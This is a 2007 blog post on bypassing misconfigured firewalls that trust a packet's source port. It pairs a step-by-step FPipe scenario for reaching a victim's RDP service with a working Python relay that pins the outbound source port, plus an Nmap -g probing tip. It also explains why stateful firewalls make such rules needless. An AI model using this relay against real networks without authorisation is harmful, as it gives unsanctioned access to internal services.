Sunday, November 25, 2007

Spoofing Source ports and getting in

An interesting, and probably reasonably well known, technique for getting past firewalls. Suppose there is a firewall out there that has, for some reason, been "configured" to allow any traffic with a source port of 23 through. Why would anyone do that? With most firewalls being stateful these days you don't need a bidirectional rule permitting all inbound traffic with, say, a source port of 23 just because you've already allowed port 23 outbound. To explain things a bit more clearly:

If you already have a rule like:
Internal Network -- Internet -- allow traffic with a destination port of 80

then you don't need a rule like:
Internet -- Internal Network -- allow traffic with a source port of 80

That is what a stateful firewall does: it keeps track of which internal client opened which connection to port 80 on which server, and only lets the reply packets belonging to that connection back in, to that very client. So a bidirectional rule that admits traffic on the strength of its source port alone is almost certainly a misconfiguration (or a leftover from stateless packet-filter days).

Still, I won't be shocked to see plenty of people out there doing exactly this, so if you happen to come across a firewall that lets traffic in based on source port, you can use FPipe to set the source port of your outbound connections and reach services inside that are blocked on their own ports from the outside.

I won't go into the details of how to use FPipe, since its documentation is easily obtainable from Foundstone. Effectively, though:

You are on Machine 1 (your own box).
You set FPipe on Machine 2 to listen on port 5555 and connect to port 3389 (RDP) on Machine 3 (the VICTIM).
You set FPipe to use port 22 as its source port, because the firewall allows inbound traffic with a source port of 22.

So when you connect to Machine 2:5555, Machine 2 initiates a connection to Machine 3:3389 using source port 22 (ALLOWED BY THE FIREWALL), and once that is up it relays everything between that connection and yours back on Machine 1, where you're doing your pen-testing. Quite cool, but really it can only be exploited where a really lazy sysadmin has been at work or a firewall as old as Fred Flintstone is in use ;)
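To show what FPipe is actually doing under the hood, here is a minimal relay of the same shape, added to this post as an illustration (it is my own stand-in, not FPipe and not Foundstone's code). The trick is nothing more than calling bind() on the outbound socket before connect(), so the OS uses the source port you name instead of picking an ephemeral one. The echo "victim" server, the payload and the port numbers (2222 standing in for 22, because binding 22 needs root) are constructed so the whole thing runs on loopback:

```python
"""FPipe-style TCP relay with a pinned source port (added example, not FPipe).

Machine 2 runs this: a client (Machine 1) connects to the listen port here and
for each client we connect to the victim (Machine 3) from a fixed source port,
the one the firewall's bidirectional rule trusts, then shuttle bytes both ways.
The echo victim and all port numbers below are constructed for a loopback demo.
"""
import socket
import threading


def connect_from_source_port(target, source_port):
    """Connect to target=(host, port) with our end bound to source_port.

    bind() before connect() is what pins the source port. SO_REUSEADDR lets the
    port be reused while an earlier relay connection from it sits in TIME_WAIT.
    Binding a port below 1024 (e.g. 22) needs root on Unix.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("", source_port))
    s.connect(target)
    return s


def pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle_client(client, target, source_port):
    """Relay one accepted client connection to target, in both directions."""
    try:
        upstream = connect_from_source_port(target, source_port)
    except OSError:
        client.close()
        return
    back = threading.Thread(target=pump, args=(upstream, client), daemon=True)
    back.start()
    pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_relay(listen_port, target, source_port, max_clients=None):
    """Start the relay in the background; return the port it really listens on."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind(("", listen_port))
    lsock.listen(5)

    def accept_loop():
        served = 0
        while max_clients is None or served < max_clients:
            client, _ = lsock.accept()
            threading.Thread(target=handle_client,
                             args=(client, target, source_port), daemon=True).start()
            served += 1
        lsock.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return lsock.getsockname()[1]


def start_echo_victim(observed):
    """Constructed stand-in for Machine 3: serves one loopback connection,
    echoes what it receives and records the peer's source port in `observed`."""
    vsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    vsock.bind(("127.0.0.1", 0))
    vsock.listen(1)

    def one_shot():
        conn, peer = vsock.accept()
        observed.append(peer[1])  # the source port the "firewall" would judge
        with conn:
            while chunk := conn.recv(4096):
                conn.sendall(chunk)
        vsock.close()

    threading.Thread(target=one_shot, daemon=True).start()
    return vsock.getsockname()[1]


def demo(source_port, payload=b"hello via pinned source port"):
    """Client -> relay -> victim, all on loopback. Returns (echoed bytes,
    source port the victim saw); the second value is the whole point."""
    observed = []
    victim_port = start_echo_victim(observed)
    relay_port = start_relay(0, ("127.0.0.1", victim_port), source_port, max_clients=1)
    with socket.create_connection(("127.0.0.1", relay_port)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        reply = b""
        while chunk := c.recv(4096):
            reply += chunk
    return reply, observed[0]


if __name__ == "__main__":
    # 2222 stands in for 22 so the demo runs unprivileged; use 22 (as root) for real.
    reply, seen = demo(2222)
    print(f"victim saw our connection arrive from source port {seen}; echoed {reply!r}")
```

Run as-is and the victim reports the relay's connection arriving from port 2222; for the real thing you would swap in 22 (as root) and the victim's address and port in place of the loopback echo server. To find out beforehand whether a firewall filters on source port at all, Nmap's -g/--source-port option sends its probes from a port you choose, so a scan with -g 22 can be compared against a plain scan of the same host; against a stateful firewall the two will look identical, which is exactly the point of this post.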
